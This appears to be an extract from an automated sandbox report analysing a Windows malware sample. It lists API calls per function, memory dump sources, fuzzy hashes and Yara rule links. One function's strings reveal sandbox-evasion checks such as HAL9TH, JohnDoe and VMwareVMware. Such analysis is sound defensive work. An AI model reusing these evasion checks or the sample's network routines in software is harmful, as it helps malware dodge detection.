                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD490
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645014), ref: 009CD4AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00645018), ref: 009CD4C6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD4DD
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD4F4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,009CB2B7), ref: 009CD50B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                  • String ID: B
                                                                                                                                                                                                                                                  • API String ID: 2238633743-3806887055
                                                                                                                                                                                                                                                  • Opcode ID: 68d40025ba20cdd3d247030dc32b72d75d51eb3007a989a3fac0a133a93af85d
                                                                                                                                                                                                                                                  • Instruction ID: 9085126213d168372a92d224c84e5f5f0947ee572651a5ee6302d90fab75e971
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68d40025ba20cdd3d247030dc32b72d75d51eb3007a989a3fac0a133a93af85d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2562B27D811640EFDB429F61FD46B643FA7FB4BB01B14712AEA028A272DB324854DF90
                                                                                                                                                                                                                                                  Function 009C0937 Relevance: 73.9, APIs: 49, Instructions: 421memorystringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C083C
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: strchr.MSVCRT ref: 009C0856
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: strchr.MSVCRT ref: 009C086E
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: lstrlen.KERNEL32(?), ref: 009C0882
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C089A
                                                                                                                                                                                                                                                    • Part of subcall function 009C07F6: strcpy_s.MSVCRT ref: 009C0915
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C0989
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C09A4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C09B0
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 009C09BB
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 009C09E3
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 009C09ED
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C09FD
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0A19
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0A25
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 009C0A30
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 009C0A4B
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 009C0A55
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0A65
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0A81
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 009C0A91
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009C0A9C
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?), ref: 009C0AAF
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 009C0AB9
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 009C0ADA
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 009C0AE4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C0AF4
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0B12
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0B1E
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?,?,?,?), ref: 009C0B28
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 009C0B2F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0B42
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 009C0B79
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0BB1
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 009C0BC9
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 009C0BD4
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?), ref: 009C0BDB
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0BEE
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0C07
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C0F
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C1A
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C45
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C4F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C5F
                                                                                                                                                                                                                                                  • strcpy_s.MSVCRT ref: 009C0C7B
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 009C0C87
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40), ref: 009C0C92
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?), ref: 009C0D35
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 009C0D3F
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?), ref: 009C0D76
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0D83
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?), ref: 009C0D8D
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 009C0DD6
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 009C0DE1
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 009C0E16
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$Process$Free$strcpy_s$lstrlen$strchr$memcpy
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3553499935-0
                                                                                                                                                                                                                                                  • Opcode ID: 975215ca6a6fb4d5367f80fe5ca197d0c8580447b4b488d64dec9b9a6ed5d922
                                                                                                                                                                                                                                                  • Instruction ID: df66da08f14047b73595b8b9731d8a091197701c9a105efc6f2a9eeaca101017
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 975215ca6a6fb4d5367f80fe5ca197d0c8580447b4b488d64dec9b9a6ed5d922
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7E169B5904314AFD724AFA59C49F6BBBADFF89740F00482DF985C7241DB74A904CBA2
                                                                                                                                                                                                                                                  Function 009B9BD2 Relevance: 58.7, APIs: 32, Strings: 1, Instructions: 972networkstringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 009C2631: memcpy.MSVCRT(?,009C25B6,?,?,00000000,?,009C25B6,?,?,009C25EF,?,?,009C25B6,?,?,?), ref: 009C267E
                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 009B9E62
                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 009B9E72
                                                                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,?,?), ref: 009B9ECE
                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 009B9ED9
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009B9EDF
                                                                                                                                                                                                                                                  • htons.WS2_32(00000000), ref: 009B9F52
                                                                                                                                                                                                                                                  • FreeAddrInfoW.WS2_32(?), ref: 009B9F6A
                                                                                                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 009B9F74
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 009BA026
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?), ref: 009BA0C4
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF), ref: 009BA12B
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,006439EB,?,00000000,000000FF), ref: 009BA1B3
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF,006439EB,?,00000000,000000FF), ref: 009BA21A
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,006439AB,?,00000000,000000FF,006439EB,?,00000000,000000FF), ref: 009BA2E6
                                                                                                                                                                                                                                                    • Part of subcall function 009C28D9: memcpy.MSVCRT(?,?,0000000F,?,00000000,00000000,?,00000000,?,009B9B1F,00000000,?,00000000,?,?,00000000), ref: 009C2932
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF,?,?,?,?,?,006439AB,?,00000000,000000FF,006439EB), ref: 009BA35B
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,0064398A,?,00000000,000000FF,?,?,?,?,?,006439AB,?,00000000,000000FF), ref: 009BA417
                                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 009BA4BD
                                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,00001000,00000000), ref: 009BA4DC
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA551
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA55A
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA563
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009BA56C
                                                                                                                                                                                                                                                  • closesocket.WS2_32(00000000), ref: 009BA5AB
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009BA5B1
                                                                                                                                                                                                                                                    • Part of subcall function 009C2593: strlen.MSVCRT ref: 009C25A1
                                                                                                                                                                                                                                                  • send.WS2_32(000000FF,?,?,00000000), ref: 009BA6D9
                                                                                                                                                                                                                                                  • recv.WS2_32(000000FF,?,00001000,00000000), ref: 009BA726
                                                                                                                                                                                                                                                    • Part of subcall function 009C2DE9: memset.MSVCRT ref: 009C2E31
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 009BA89B
                                                                                                                                                                                                                                                  • send.WS2_32(000000FF,?,?,00000000), ref: 009BA92A
                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 009BA931
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009BA937
                                                                                                                                                                                                                                                  • closesocket.WS2_32(000000FF), ref: 009BA98D
                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 009BA993
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove$Cleanupclosesocketrand$send$memcpyrecvstrlen$AddrFreeInfoStartupconnectgetaddrinfohtonsmemsetsocket
                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                  • API String ID: 703715170-336475711
                                                                                                                                                                                                                                                  • Opcode ID: 978f3084348ff5871f820b77ddbc49b661c548069cd3dc5d3495d8df9675ee71
                                                                                                                                                                                                                                                  • Instruction ID: cfc4fba1217d76a217461e927259d43e644966f9f632e1bb32f433cbd1611ab5
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 978f3084348ff5871f820b77ddbc49b661c548069cd3dc5d3495d8df9675ee71
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D782F0706083809FD334EF24C944BABBBE5AFD5310F14492DE4898B392DBB59949CB93
                                                                                                                                                                                                                                                  Function 00402BEB Relevance: 35.1, Strings: 28, Instructions: 135COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %hu/%hu/$%hu/%hu/%hu$CreateDC$CreateDCA$CryptStringToBinaryA$DISPLAY$DISPLAY$GetDevic$GetDeviceCaps$GetUserN$GetUserNameA$HAL9TH$JohnDoe$JohnDoe$NtQueryInformationProcess$ReleaseD$ReleaseDC$VMwareVM$VMwareVMware$crypt32.$crypt32.dll$gdi32.dl$gdi32.dll$ntdll.dl$ntdll.dll$sscanf$user32.d$user32.dll
                                                                                                                                                                                                                                                  • API String ID: 0-2179091496
                                                                                                                                                                                                                                                  • Opcode ID: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
                                                                                                                                                                                                                                                  • Instruction ID: 86e27b9bdcb8569573e06bdff851749a70f31a48c5ecb8a307c45d2392953fab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d03c016c40e7bf2fefc509958d87a2e635967e32702d11625f5e8fc5cb7fd27
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2A712861818BC58ED712CF24AD187563FE3AB5B348F08725EC8541E2B6D7FA0089C7D9
                                                                                                                                                                                                                                                  Function 009BA157 Relevance: 26.0, APIs: 17, Instructions: 516COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memmove.MSVCRT(00000000,00000000,?,006439EB,?,00000000,000000FF), ref: 009BA1B3
                                                                                                                                                                                                                                                  • memmove.MSVCRT(?,00000000,?,?,00000000,000000FF,006439EB,?,00000000,000000FF), ref: 009BA21A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: memmove
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2162964266-0
                                                                                                                                                                                                                                                  • Opcode ID: fcee40670d18bfa8b55c131fba8c64f0c996933fe92a8a7a89a6ae439863f39c
                                                                                                                                                                                                                                                  • Instruction ID: 086259b2d22bd2bfe3b2a397170b43d534d73a5dc43c13f1e7bea2724f7834f4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcee40670d18bfa8b55c131fba8c64f0c996933fe92a8a7a89a6ae439863f39c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6912DF709083809FC324DF64D991BABBBE5AFC5310F54492DF4CA8B292DB75A909CB53
                                                                                                                                                                                                                                                  Function 00420040 Relevance: 23.4, APIs: 15, Instructions: 934stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 004200A2
                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0042011F
                                                                                                                                                                                                                                                    • Part of subcall function 0041FB48: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041FB8B
                                                                                                                                                                                                                                                    • Part of subcall function 0041FB48: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041FBBC
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: ??_V@YAXPAX@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9AA
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: ??_U@YAPAXI@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9BC
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9CD
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA11
                                                                                                                                                                                                                                                    • Part of subcall function 0041F988: WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA2D
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,0042EEFC,?,?), ref: 004201C3
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,?), ref: 004201D5
                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 004201DF
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00645162), ref: 00420219
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,0042EEFC,00000000), ref: 00420238
                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00420676
                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 0042067E
                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 00420687
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0042069B
                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(?,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?,00000001,?), ref: 004208EC
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?), ref: 004208FE
                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000360), ref: 00420912
                                                                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000360), ref: 0042091F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2204360169.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000447000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000045A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000489000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.00000000005B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000643000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2204360169.0000000000647000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcpymemcpy$File$Pointer$??2@CountDesktopTickWindowWritelstrcatlstrlenrandsrandstrlen
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3082602272-0
                                                                                                                                                                                                                                                  • Opcode ID: 15cc0c2050461c285af5a59739b3565dc7628d347b5c94367d8e110c7e1f2880
                                                                                                                                                                                                                                                  • Instruction ID: 8471b57ff9ca47bc0cbb98eb1f71a8ac035a9bb11ea19f14e781d6706823b61e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 15cc0c2050461c285af5a59739b3565dc7628d347b5c94367d8e110c7e1f2880
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5572A674208394AFC711AF259894BAFBFE9AF96304F44049EF4C94B343C6399946CB76
                                                                                                                                                                                                                                                  Function 009CAE0D Relevance: 22.6, APIs: 15, Instructions: 139stringfileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2205023131.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9b0000_dZKPE9gotO.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _mbscpy$FileFindstrcmpstrlenwsprintf$CloseFirstFolderOperationPath_splitpathisupper
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 260673504-0
                                                                                                                                                                                                                                                  • Opcode ID: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
                                                                                                                                                                                                                                                  • Instruction ID: e6ecd3275dc28bab13b93c7583a33c8cfb7888907ac144467030418babc37574
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9de74252184d4e92245189a4cf74812e0976ee0e09d85f25a583efaa8448754d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6516DB2C083846ED321DB30AC46B9B3BFDDF92308F44156DF95492251EBB59548C3A7
                                                                                                                                                                                                                                                  Function 009D02A7 Relevance: 18.9, APIs: 12, Instructions: 934stringCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,?), ref: 009D0309
                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(?), ref: 009D0446
                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00645162), ref: 009D0480
                                                                                                                                                                                                                                                  • lstrcpy.KERNEL32(?,0042EEFC), ref: 009D049F
                                                                                                                                                                                                                                                    • Part of subcall function 009CFDAF: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 009CFDF2
                                                                                                                                                                                                                                                    • Part of subcall function 009CFDAF: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 009CFE23
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 009CFC23
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC34
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: memcpy.MSVCRT(?,?,?), ref: 009CFC78
                                                                                                                                                                                                                                                    • Part of subcall function 009CFBEF: WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,009D05C9,?,00000001), ref: 009CFC94
                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 009D08DD
                                                                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 009D08E5
                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 009D08EE
                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 009D0902
